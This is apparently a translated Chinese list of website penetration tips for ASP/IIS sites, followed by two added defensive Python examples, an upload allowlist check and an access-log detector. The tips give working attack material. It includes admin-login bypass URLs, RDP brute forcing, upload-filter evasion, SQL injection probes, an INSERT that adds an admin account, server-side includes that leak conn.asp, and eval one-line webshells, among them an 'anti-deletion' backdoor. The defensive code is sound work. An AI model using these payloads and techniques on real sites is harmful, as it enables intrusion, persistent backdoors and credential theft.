1. Bypass the back-end (admin) login check directly by appending admin/session.asp or admin/left.asp to the site address.
2. Some back-ends show a script prompt box; entering "Administrator" gets through. "Admin" means entering as the administrator.
3. Some sites have port 3389 open. Before intruding, connect to 3389 and try weak passwords or brute force; the other trick is to press the SHIFT key five times to see whether an earlier intruder installed a backdoor, and then social-engineer the password.
4. Sometimes the back-end pops up a "Please login" prompt box. Copy the address out (it cannot be copied directly), paste it into the Web Source Code Analyzer, select Browser, tick "intercept redirect", and the back-end opens.
5. Breaking through anti-leech (hotlink) protection to reach a Webshell; code:
javascript:document.write("<a href='http://www.xxx.com/uploadfile/1.asp'>fuck</a>")
Click the link that appears to enter the Webshell.
6. Breaking through the "first-class information monitoring interception system": when the small (one-line) shell can be accessed but the big shell cannot, first merge the big shell with a picture, upload the merged picture, and then reach it through the database backup.
7. When taking a shell through the editor, added extensions such as asp|asa|cer|php|aspx are sometimes filtered; in fact, adding AASPSP and uploading the ASP file gets through.
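Item 7 describes a filter that removes a blacklisted token from the file name once and keeps the result, which is why a stuffed extension survives. The following Python is an added example (not code from the page or from any product it names) that shows that vulnerable pattern beside an allowlist check of the kind an upload handler should use; the set of allowed image extensions and the server-generated storage name are assumptions.

```python
import secrets
from pathlib import PurePosixPath
from typing import Optional

# Extensions the upload handler is meant to accept (assumed: an image uploader).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# The blacklist the text describes: asp|asa|cer|php|aspx and similar.
BLACKLISTED_TOKENS = ("aspx", "asp", "asa", "cer", "php")


def naive_blacklist_filter(filename: str) -> str:
    """Vulnerable pattern: delete each blacklisted token from the name, once, and keep
    whatever is left. Stripping "asp" from "aaspsp" leaves "asp", so the stored name
    is exactly the one the filter was supposed to block."""
    cleaned = filename
    for token in BLACKLISTED_TOKENS:
        cleaned = cleaned.replace(token, "", 1)
    return cleaned


def hardened_allowlist_check(filename: str) -> bool:
    """Defensive pattern: decide on the final extension only, against an allowlist,
    after normalising the name; anything not explicitly allowed is rejected, so no
    amount of token stuffing can produce an accepted name."""
    name = PurePosixPath(filename.replace("\\", "/")).name  # drop any directory part
    if not name or "\x00" in name or name.startswith("."):
        return False
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False  # no extension at all
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return False  # final extension is not on the allowlist
    # Reject double extensions such as shell.asp.jpg as well: some servers pick
    # a handler from an inner extension, and there is no legitimate need for them.
    if any(p in BLACKLISTED_TOKENS for p in parts[:-1]):
        return False
    return True


def stored_name(filename: str) -> Optional[str]:
    """Accepted uploads are stored under a server-generated name, so the client-supplied
    name never reaches the filesystem; returns None when the upload is rejected."""
    if not hardened_allowlist_check(filename):
        return None
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for candidate in ("photo.jpg", "shell.asp", "shell.aaspsp", "shell.asp.jpg"):
        print(f"{candidate:15} naive -> {naive_blacklist_filter(candidate):12} "
              f"allowlist -> {hardened_allowlist_check(candidate)}")
```

The naive filter turns `shell.aaspsp` into `shell.asp`; the allowlist check never looks for bad tokens to remove, it only accepts a known-good final extension, and the stored name discards the client's name entirely.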
8. Sometimes Ah D guesses the table but cannot guess the fields. Look at the back-end's source files and search for "ID" or "type"; the fields can usually be found there. Then add the field in Ah D and guess its content.
9. Social-engineering a back-end password: if the site domain is Exehack.net and the administrator name is admin, try the passwords "exehack" and "exehack.net" to log in.
10. In manual injection, if the site filters "and 1=1" and "and 1=2", use "xor 1=1" and "xor 1=2" to judge instead.
11. Building a one-line trojan upload locally: if prompted "Please select the file you want to upload! [Re-upload]", the file is too small. Open it in Notepad, paste in more text to enlarge it, and upload again.
12. Using Ah D, running the field names name and pass shows a length of 50 or so; guess the case, then put them into Pangolin to run, which usually succeeds.
13. Guessing the administrator back-end: admin/left.asp, admin/main.asp, admin/top.asp and admin/admin.asp show the menu navigation; then download all the links with Thunder.
14. Knowing the table name and fields, use a SQL statement to add a username and password to the Access database:
INSERT INTO admin (user, pwd) VALUES ('test', 'test')
15. When you have the administrator password but not the account name, open any news item on the front end and look for words such as "Submitter" or "Publisher"; the "submitter" is usually the administrator's account.
16. Blasting the absolute path of an ASP+IIS site: assuming the site home page is http://www.xxxxx/index.asp, submit http://www.xxxxx.cn/fkbhvv.aspx/, where fkbhvv.aspx does not exist.
17. Using the source code: many sites are built from downloaded source packages, and some webmasters are lazy and upload them without changing anything. Download a copy; a lot of the default information in it is worth using.
18. Upload the following code to the Webshell with the suffix ASP; even if someone finds it, it cannot be deleted. It is a super anti-deletion one-line trojan and a safe place to leave a backdoor; chopper connection password: X
<%Eval(Request (chr)): Set Fso=createobject ("Scripting.FileSystemObject"): Set F=FSO. GetFile (Request.ServerVariables ("path_translated")):if f.attributes <> then:f.attributes = 39 :Endif%>
19. When the back-end password has been cracked, try connecting to FTP as well. If the domain is www.baidu.com and the password obtained is "Bishi", try "xxxx", "xxxx.cn" and "www.xxxx.cn" as the FTP user name with "Bishi" as the FTP password; the odds of success are quite good. Default FTP port: 21; default account and password: Test
20. Some back-ends do not display the verification code, so you cannot log in? Importing one registry entry gets past this. Save the following as Code.reg and double-click it to import:
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BLOCKXBM"=dword:00000000
21. When the site does not allow uploading ASP, ASA, PHP and other files, upload an STM file with the code:
<!--#include file="conn.asp"-->
(Write the name of whichever file you want to view; here I pretend to view "conn.asp".)
Then open the address of the STM file directly and view the source: the code of conn.asp is displayed.
22. When the site does not allow uploading files of the types asp, cgi, cer, cdx, htr and so on, try uploading a shtm file with the content:
<!--#include file="conn.asp"-->
If the upload succeeds, accessing the address shows the contents of conn.asp, so the database path is in hand.
23. When manually testing an injection point pops up "Your operation has been recorded!" or similar, try accessing the file sqlin.asp; if it exists, insert a one-line trojan behind the injection point:
' Excute (Request ("TNT"))
Then connect with a one-line trojan client to http://www.xxx.com/sqlin.asp and upload a trojan to get the shell, because many anti-injection programs use the file name "sqlin.asp" for the database of illegal-operation records.
24. For a side-station (adjacent site) attack, the site must support ASPX; how to judge it? Simply append xxx.aspx to the site address: if it returns "Server Error in '/' Application, the resource cannot be found", the 404 page, then it supports an ASPX trojan.
25. Append test.php to the site address to view the version.
26. Keep in mind these two back-end files: admin_index.asp and manage_login.asp
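Several of the items above leave distinctive traces in a web server's access log: direct requests to the admin pages of items 1 and 13 from a client that never posted to the login page, the boolean probes of item 10 (and 1=1, xor 1=1), requests for the sqlin.asp record file of item 23, and server-side-include files under the upload directory from items 21 and 22. The following Python is an added example of a log check for those traces; it is not code from the page, the log lines are constructed, and the login handler path /admin/login.asp and the upload directory /uploadfile/ are assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample lines in common log format (not from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.asp HTTP/1.1" 200 1200
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /admin/left.asp HTTP/1.1" 200 800
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /news.asp?id=12%20xor%201=1%20xor%201=2 HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2024:10:01:05 +0000] "GET /news.asp?id=12%20and%201=2 HTTP/1.1" 200 300
10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "GET /sqlin.asp HTTP/1.1" 200 200
10.0.0.7 - - [01/Jan/2024:10:03:00 +0000] "POST /upload.asp HTTP/1.1" 200 50
10.0.0.7 - - [01/Jan/2024:10:03:01 +0000] "GET /uploadfile/x.shtm HTTP/1.1" 200 600
10.0.0.3 - - [01/Jan/2024:10:04:00 +0000] "POST /admin/login.asp HTTP/1.1" 302 0
10.0.0.3 - - [01/Jan/2024:10:04:01 +0000] "GET /admin/main.asp HTTP/1.1" 200 800
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Admin pages named in items 1 and 13 that should only be reachable after login.
ADMIN_PAGES = {"/admin/session.asp", "/admin/left.asp", "/admin/main.asp",
               "/admin/top.asp", "/admin/admin.asp"}
LOGIN_PAGES = {"/admin/login.asp"}   # assumed name of the login handler
UPLOAD_DIR = "/uploadfile/"          # assumed upload directory
# Boolean probes from item 10: "and 1=1", "and 1=2", "xor 1=1", ...
SQLI_RE = re.compile(r"\b(and|or|xor)\s+\d+\s*=\s*\d+", re.IGNORECASE)
# Server-side-include extensions from items 21 and 22.
SSI_RE = re.compile(r"\.(stm|shtm|shtml)$", re.IGNORECASE)

Finding = Tuple[str, str, str]  # (client ip, reason, request)


def parse_line(line: str) -> Optional[dict]:
    """Split one common-log-format line into ip, method, path and decoded query."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    path, _, query = rec["path"].partition("?")
    rec["path"] = path
    rec["query"] = unquote(query)
    return rec


def analyse(log_text: str) -> List[Finding]:
    """Walk the log in order, remembering which clients posted to the login page,
    and report the traces described in the text."""
    findings: List[Finding] = []
    logged_in = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, query = rec["ip"], rec["path"], rec["query"]
        if path in LOGIN_PAGES and rec["method"] == "POST":
            logged_in.add(ip)
        if path in ADMIN_PAGES and ip not in logged_in:
            findings.append((ip, "admin page requested without prior login", path))
        if SQLI_RE.search(query):
            findings.append((ip, "boolean SQL injection probe", f"{path}?{query}"))
        if path == "/sqlin.asp":
            findings.append((ip, "anti-injection record file requested", path))
        if path.startswith(UPLOAD_DIR) and SSI_RE.search(path):
            findings.append((ip, "server-side include file under upload directory", path))
    return findings


if __name__ == "__main__":
    for ip, reason, request in analyse(SAMPLE_LOG):
        print(f"{ip:10} {reason:50} {request}")
```

The login tracking is deliberately simple (a POST to the login page counts as logged in, regardless of outcome); the point is that 10.0.0.3, which posted to the login page first, is not flagged for /admin/main.asp, while 10.0.0.5, which went straight to /admin/left.asp, is.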
Website personal penetration Skills collection and summary